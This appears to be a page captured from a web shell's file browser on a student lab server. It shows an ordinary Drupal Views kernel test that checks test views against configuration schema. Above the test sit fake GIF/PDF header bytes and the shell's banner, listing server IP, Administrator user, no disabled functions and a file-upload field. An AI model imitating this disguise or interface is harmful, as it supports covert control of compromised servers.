GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /nginx/html/Student/JimMartinson/Lab12/drupal/core/modules/views/tests/src/Kernel/ |
Upload File : |
<?php namespace Drupal\Tests\views\Kernel; use Drupal\Tests\SchemaCheckTestTrait; use Drupal\config_test\TestInstallStorage; use Drupal\Core\Config\InstallStorage; use Drupal\Core\Config\TypedConfigManager; use Drupal\KernelTests\KernelTestBase; /** * Tests that test views provided by all modules match schema. * * @group config */ class TestViewsTest extends KernelTestBase { use SchemaCheckTestTrait; /** * Modules to enable. * * @var array */ public static $modules = ['views_test_data']; /** * Tests default configuration data type. */ public function testDefaultConfig() { // Create a typed config manager with access to configuration schema in // every module, profile and theme. $typed_config = new TypedConfigManager( \Drupal::service('config.storage'), new TestInstallStorage(InstallStorage::CONFIG_SCHEMA_DIRECTORY), \Drupal::service('cache.discovery'), \Drupal::service('module_handler') ); // Create a configuration storage with access to default configuration in // every module, profile and theme. $default_config_storage = new TestInstallStorage('test_views'); foreach ($default_config_storage->listAll() as $config_name) { // Skip files provided by the config_schema_test module since that module // is explicitly for testing schema. if (strpos($config_name, 'config_schema_test') === 0) { continue; } $data = $default_config_storage->read($config_name); $this->assertConfigSchema($typed_config, $config_name, $data); } } }